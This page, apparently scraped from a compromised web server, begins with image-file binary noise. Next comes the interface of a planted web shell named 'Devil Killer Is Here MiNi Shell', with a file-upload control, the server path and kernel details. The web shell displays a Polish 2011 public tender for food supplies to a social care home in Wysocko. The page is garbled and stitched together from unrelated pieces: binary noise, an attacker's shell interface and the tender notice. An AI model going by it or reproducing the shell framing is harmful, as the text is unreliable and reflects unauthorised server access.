JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/410036-N-2011.html

<p class="kh_header"><b>Laszki: Dostawa artykułów spożywczych do DPS w Wysocku w I półroczu 2011r.</b><br>
<b>Numer ogłoszenia: 410036 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Wysocku , Wysocko 2, 37-543 Laszki, woj. podkarpackie, tel. 016 6285357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.ipzp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do DPS w Wysocku w I półroczu 2011r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia: 
Przedmiot niniejszego zamówienia obejmuje dostawę artykułów spożywczych według Kodu CPV - 15.00.00.00-8 w następujących kategorii: 
Kategoria Nr 1 - dostawa WARZYWA, OWOCE I JAJA                                                                                                                                      
Kategoria Nr 2 - dostawa WĘDLIN I MIĘSA         
Kategoria Nr 3 - dostawa NABIAŁU                        
Kategoria Nr 4 - dostawa MROŻONEK I KONSERW RYBNYCH  
Kategoria Nr 5 - dostawa PIECZYWA                    
Kategoria Nr 6 - dostawa WYROBÓW CUKIERNICZYCH    
Kategoria Nr 7 - dostawa  POZOSTAŁYCH RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH, 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamówionego towaru.
Zamawiający będzie składał Wykonawcy sukcesywne zamówienia przekazywane faxem lub telefonicznie  i potwierdzone faxem następnego dnia .
Zamówienie będzie składane z 2 - dniowym wyprzedzeniem przed ustalonym terminem dostawy. Osoba upoważnioną do składania zamówienia jest Insp. ds. Żywienia.
Wykonawca dostarczy towar bez względu na wielkość zamówienia w ciągu 2 dni roboczych licząc od dnia otrzymania zamówienia.
Zamawiany towar Wykonawca dostarczać będzie na własny koszt do magazynu DPS w godz. od 
7 do 11.
Wykonawca zobowiązany jest dostarczyć zamówiony towar w opakowaniu zapewniającym odpowiednie warunki sanitarne oraz zabezpieczającym go przed zniszczeniem lub uszkodzeniem, transportem spełniającym wymagania higieniczno - sanitarne. Dla wyrobów mleczarskich i mięsa Wykonawca zobowiązuje się do zachowania tzw. Ciągu chłodniczego, tj. przechowywania i transportu wyrobów w urządzeniach spełniających warunki techniczne przewidziane w polskiej normie.
Zamawiający zobowiązany jest każdorazowo w obecności przedstawiciela Wykonawcy dokonać ilościowego i jakościowego odbioru towaru, który potwierdza przez pokwitowanie dowodu dostawy.
1.  Zamawiający zobowiązuje się do zbadania towaru podczas odbioru i dokona sprawdzenia :
         	1.1 Warunków transportu, w tym czystości środka transportu  opakowań i inne  
            warunki mające wpływ na jakość zdrowotną przewożonych artykułów oraz sposób   
            wyładowania zapobiegający ich zanieczyszczeniu
            1.2 Dokumentacji dotyczącej dostarczonych artykułów spożywczych , w tym  
             pochodzenia, producenta, daty produkcji i świadectwo kontroli jakości.
            1.3 Opakowań zbiorczych i jednostkowych: obce zapachy, uszkodzenia ,  
             zawilgocenie, bombaż puszek, obecności szkodników itp.
            1.4 Znakowania artykułów spożywczych, a zwłaszcza terminu przydatności                     
            do spożycia i daty minimalnej trwałości, czytelności i trwałości znakowania,
            1.5 Cech organoleptycznych, widocznych zanieczyszczeń, zapleśnienia,           
             szkodników itp.
 2.W przypadku niedochowania powyższych wymogów Wykonawca ma obowiązek    uznania reklamacji jakości dostarczonego towaru i na własny koszt jest zobowiązany wymienić towar na pełnowartościowy, nie budzący żadnych zastrzeżeń oraz w razie potrzeby zastosować inny środek transportu.                               2. Odpowiedzialność za dostarczany i odbierany towar określa moment odbioru towaru 
     ( przekazania)
3. W razie stwierdzenia braków Wykonawca uzupełni towar w tym samym dniu lub najpóźniej następnego dnia bez żadnej dopłaty.
4.  Wykonawca zobowiązuje się dostarczać towar dobrej jakości tj. świeży, I gatunku, czysty, bez obcych zapachów o właściwej gramaturze oraz z właściwym terminem przydatności do spożycia
5. Termin przydatności dostarczonego towaru ma być nie mniejszy niż 50 % całkowitego okresu przydatności do spożycia.
6. Towar będzie oznaczony zgodnie z obowiązującymi przepisami. Musi posiadać na opakowaniu opis i cechowanie określające jego właściwości. Opakowanie nie powinno wskazywać oznak uszkodzeń mechanicznych. Towar nie może wykazać oznak nieświeżości, przemrożenia bądź zepsucia.
7. W celu potwierdzenia jakości dostarczanego przez Wykonawcę towaru Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentacji dotyczącej artykułów spożywczych, określających w szczególności ich pochodzenie, producenta, datę produkcji, świadectwo kontroli jakości (Handlowy Dokument Identyfikacyjny)
8.   Brak wymaganych dokumentów wstrzymuje zapłatę za dostarczony towar.
9. W razie stwierdzenia przy odbiorze towaru , że nie odpowiada on zamówionemu asortymentowi lub nie spełnia norm jakościowych, zamawiający ma prawo odmówić jego odbioru, a Wykonawca zobowiązany jest niezwłocznie do dostarczenia nowego towaru.
10. W razie dostarczenia towaru złej jakości, której nie można było stwierdzić w trakcie odbioru towaru odbiorca ma prawo złożenia pisemnej lub telefonicznej reklamacji w ciągu 24 godzin od jego wykrycia, a Wykonawca jest zobowiązany wymienić reklamowany towar na wolny od wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3, 15.13.11.30-5, 15.13.11.35-0, 15.11.10.00-9, 15.11.00.00-2, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1, 15.22.10.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.11.20.00-6, 15.23.40.00-7, 15.81.10.00-6, 15.84.23.00-5, 15.33.22.00-6, 15.85.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający wymagania określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i nie podlegają wykluczeniu z udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 wyżej wymienionej ustawy.
2.	Wykonawca ubiegający się o udzielenie zamówienia musi spełniać warunki udziału w postępowaniu dotyczące:
1)	posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadania niezbędnej wiedzy i doświadczenia, oraz dysponują potencjałem technicznym
      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy
3.    Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach 
        zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, 
        niezależnie od charakteru prawnego łączących go z nim stosunków.
4.    Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia,
       w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych  
       poniżej.

Oświadczenia i dokumenty,  jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia.
1.	  W celu potwierdzenia, że Wykonawca spełnienia warunki udziału w postępowaniu o  
        zamówienie Zamawiający wymaga złożenia w ofercie następujących oświadczeń i 
        dokumentów: 
         1)  Oświadczenie, że Wykonawca spełnia warunki w zakresie określonym w art. 22 ust. 1
ustawy Prawo zamówień publicznych, sporządzone według wzoru stanowiącego Załącznik Nr 4 do niniejszej SIWZ;
2.      Jeśli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach    
         zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jednocześnie poleganie Wykonawcy na wiedzy i doświadczeniu innych podmiotów nierozerwalnie wiąże się z tym, że podmioty te będą realizowały część zamówienia jako podwykonawcy, a Wykonawca przedstawi pisemne zobowiązanie tych podmiotów do wykonywania części udzielanego zamówienia.
3.      W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24, ust. 1ustway Pzp Zamawiający wymaga złożenia w ofercie następujących oświadczeń i dokumentów:
         1)   Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania o 
               Udzielenie zamówienia, sporządzone według wzoru stanowiącego Załącznik Nr 5 do 
                niniejszej SIWZ;
2)   Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt 2 ustawy; sporządzone według wzoru (wzór Załącznik Nr 6 do niniejszej SIWZ);
   3)   Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,
               że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         4)   Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub 
Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę
lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 
    6 miesięcy przed upływem terminu składania ofert;
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
    albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty   
    zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -    
    wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej 
    niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dostarczy artykuły spożywcze do magazynu DPS w Wysocku własnym transpotrem na własny koszt.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/dpswysocko<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Wysocku
37-543 Laszki; powiat jarosławski; woj. podkarpackie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej w Wysocku
37-543 Laszki; Sekretariat - Budynek Administracyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WARZYWA, OWOCE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw, owoców i jaj w asortymencie i ilości:1.	Pietruszka	Kg	90
2.	Marchew	Kg	350
3.	Cebula	Kg	280
4.	Buraczki ćwikłowe	Kg	200
5.	Fasola  Jaś	Kg	25
6.	Kapusta czerwona	kg	80
7.	Kapusta biała	Kg	350
8.	Ogórki kiszone 	kg	40
9.	Kapusta pekińska	kg.	120
10.	Pomidory	Kg	90
11.	Ogórek zielony	Kg	50
12.	Pory	Kg	70
13.	Natka pietruszki (pęczek)	Szt.	120
14.	Koperek zielony (pęczek)	Szt.	160
15.	Sałata zielona	kg	30
16.	Seler	Kg	90
17.	Szczypiorek	Szt.	120
18.	Mak niebieski	Kg	2
19.	Papryka świeża 	Kg	15
20.	Kapusta kiszona	Kg	160
21.	Pieczarki świeże	kg	45
22.	Susz koperku 20g.	szt	20
23.	Susz natki pietruszki 20g. 	szt	20
24.	Czosnek	Kg	7
25.	Ziemniaki 	Kg	4500
26	Banany	Kg	230
27	Pomarańcze	Kg	80
28	Jabłka	Kg	400
29	Cytryny	Kg	15
30	Klementynki 	Kg	160
31	Jaja 	Szt.	6500                                                                                                                          
32	Żur naturalny 500g	Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WĘDLINY I MIĘSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wędlin i mięsa w asortymencie i ilości: 1.	Szynka drobiowa	Kg	60
2.	Szynka wieprzowaextra	Kg	30
3.	Kiełbasa szynkowa wp. extra	Kg	70
4.	Kiełbasa zwyczajna	Kg	150
5.	Kiełbasa parówkowa	Kg	140
6.	Kiełbasa krakowska parzona	Kg	80
7.	Kiełbasa wiejska	Kg	30
8.	Kiełbasa mortadela	Kg	80
9.	Kiełbasa lencz	Kg	80
10.	Parówki śniadaniowe	Kg	50
11.	Kiszka gryczana wiejska	Kg	90
12.	Pieczeń myśliwska	Kg	120
13.	Pasztet luzem wp. delikatesowy	Kg	60
14.	Pasztetowa firmowa	Kg	70
15.	Salceson regionalny	Kg	80
16.	Smaczek konserwowy	Kg	90
17.	Szynka kanapkowa	Kg	90
18.	Boczek wędzony	Kg	25
19.	Baleron got. wieprz.	Kg	40
20.	Szynka  konserwowa blok	Kg	80
21	Parówki drobiowe	Kg	50
22	Polędwica wieprzowamięso 	Kg	50
23	Karkówka wieprzowa bez kości	Kg	150
24	Kości wieprzowe pokrzepowe	Kg	230
25	Łopatka wp. b/k mięso	Kg	140
26	Mięso mielone wp.	Kg	240
27	Galareta wp.	kg	60
28	Mięso - pieczeń wołowa ekstra 	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.11.30-5, 15.13.11.35-0, 15.11.11.11-9, 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nabiału w asortymencie i ilości: 1.	Twaróg chudy	Kg	250
2.	Śmietana 18 %	L	430
3.	Masło z olejem extra 200g	Kg	140
4.	Ser żółty salami	Kg	60
5.	Ser topiony 100 g	Szt.	800
6.	Ser plastry 150 g	Szt.	200
7.	Mleko pasteryzowane homogenizowane folia 2 %	L	3100
8.	Masło roślinne 500 g 	Kg	450
9.	Jogurt owocowy 125 g	Szt.	1600
10.	Kefir 200g	szt	1000
11	Maślanka 1l	l	240
12	Margaryna mleczna 250g	kg	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MROŻONKI I KONSERWY RYBNE.</p>
